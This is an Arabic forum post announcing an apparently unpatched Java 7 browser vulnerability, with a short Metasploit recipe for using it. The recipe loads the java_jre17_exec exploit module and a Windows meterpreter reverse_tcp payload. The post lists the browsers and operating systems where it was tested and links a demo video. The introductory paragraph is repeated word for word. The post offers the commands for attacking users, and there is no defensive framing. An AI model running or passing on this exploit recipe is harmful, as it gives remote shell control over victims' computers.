السلام عليكم ورحمة الله وبركاته
من متابعتي لثغرات لاحظت نزول ثغرة قوية حبيت اعطيكم نبذه عنها
الثغرة قوية نوعا ما لسبب تعمل على جميع الانظمة وعلى اغلب المتصفحات المشهورة
الثغرة موجودة في Java اخر اصدار 7 اي انه اي نظام يستخدمه الجافا ومفعل يمكن اختراقه بهذه الثغرة !
المتفحات تمت التجربه عليها
Firefox 14.0.1 (Windows, Linux,OSX), IE 9, Safari 6.
الانظمة تمت التجربه عليها
Windows7, Ubuntu 12.04, OSX 10.8.1 Windows XP Pro SP3.
هنا كود الثغرة على metasploit
لتطبيق الثغرة على metaspliot
من متابعتي لثغرات لاحظت نزول ثغرة قوية حبيت اعطيكم نبذه عنها
الثغرة قوية نوعا ما لسبب تعمل على جميع الانظمة وعلى اغلب المتصفحات المشهورة
الثغرة موجودة في Java اخر اصدار 7 اي انه اي نظام يستخدمه الجافا ومفعل يمكن اختراقه بهذه الثغرة !
المتفحات تمت التجربه عليها
Firefox 14.0.1 (Windows, Linux,OSX), IE 9, Safari 6.
الانظمة تمت التجربه عليها
Windows7, Ubuntu 12.04, OSX 10.8.1 Windows XP Pro SP3.
هنا كود الثغرة على metasploit
لتطبيق الثغرة على metaspliot
كود:
use exploit/multi/browser/java_jre17_exec set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit
http://www.youtube.com/watch?feature=player_embedded&v=K5JWrWNB-eE
هنا تجربة على Ubuntu 12.04
هنا تجربة على MAC وبقية الانظمة
نجحت التجربة معي على Windows 7 الاصدار 7 للجافا التحديث 6 اخر تحديث
اي انه لم يصدر ترقيع لثغرة حتى الان